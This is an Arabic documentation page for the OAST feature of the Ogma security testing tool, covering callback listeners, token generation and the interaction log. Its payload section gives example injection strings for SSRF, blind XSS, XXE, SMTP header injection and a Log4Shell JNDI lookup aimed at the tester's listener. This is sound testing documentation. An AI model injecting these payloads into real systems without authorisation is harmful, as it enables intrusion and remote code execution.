OAST
يكشف OAST (اختبار أمان التطبيقات خارج القناة) الثغرات التي لا تنتج استجابة مرئية؛ إذ ينشئ الهدف بدلا من ذلك اتصالا صادرا إلى مستمع تتحكم فيه، مما يؤكد المشكلة.
آلية العمل
يشغل Ogma مستمعين محليين لعدة بروتوكولات. عندما يتصل التطبيق الهدف بأحد هؤلاء المستمعين، يسجل التفاعل مع عنوان IP المصدر والطابع الزمني والبيانات المستلمة والرمز الذي حقن.
بروتوكولات المستمعين
| البروتوكول | المنفذ الافتراضي | حالة الاستخدام |
|---|---|---|
| HTTP | قابل للإعداد | SSRF وXSS الأعمى وخطافات الويب |
| HTTPS | قابل للإعداد | SSRF عبر TLS |
| DNS | قابل للإعداد | الحقن الأعمى وXXE وlog4shell |
| SMTP | قابل للإعداد | حقن ترويسات البريد الإلكتروني وSSRF إلى خدمات البريد |
أعد منافذ المستمعين واسم النطاق المستخدم في الرموز المولدة في لوحة إعدادات OAST.
توليد رمز اتصال راجع
- افتح الأدوات المساعدة > OAST.
- انقر توليد رمز. يكون كل رمز فريدا لكل اختبار.
- انسخ الرمز. يتضمن نطاق المستمع ومعرفا فريدا لربط التفاعلات بالاختبار المحدد الذي تسبب فيها.
مثال على صيغة الرمز: [unique-id].[your-oast-domain]
استخدام الرموز في الحمولات
احقن رمز الاتصال الراجع في أي حقل قد يدفع التطبيق إلى إنشاء اتصال صادر:
- SSRF: استخدم رمز HTTP/HTTPS بوصفه عنوان URL الهدف:
https://[token]/ - XXE: أشر إلى الرمز في DOCTYPE أو في عنوان URL لكيان خارجي.
- Log4Shell: ضعه في ترويسة:
${jndi:ldap://[token]/a} - XSS الأعمى: احقنه في خاصية src لعنصر script:
<script src="https://[token]/x.js"></script> - حقن SMTP: استخدمه بوصفه عنوان وجهة أو عنوان URL في ترويسات البريد الإلكتروني.
سجل التفاعلات
تعرض لوحة التفاعلات كل اتصال راجع مستلم:
| العمود | الوصف |
|---|---|
| الوقت | وقت استلام التفاعل |
| البروتوكول | HTTP أو HTTPS أو DNS أو SMTP |
| عنوان IP المصدر | عنوان IP الذي أنشأ الاتصال |
| الرمز | الرمز الذي جرى الاتصال به |
| البيانات | مسار الطلب أو اسم استعلام DNS أو بيانات SMTP |
انقر أي صف لعرض تفاصيل التفاعل كاملة، بما فيها ترويسات الطلب ومتنه حيثما ينطبق ذلك.
ربط التفاعلات بالاختبارات
لأن كل رمز فريد، يمكنك حقن رموز مختلفة في معاملات أو طلبات مختلفة وتحديد نقطة الحقن التي تسببت في الاتصال الراجع بدقة.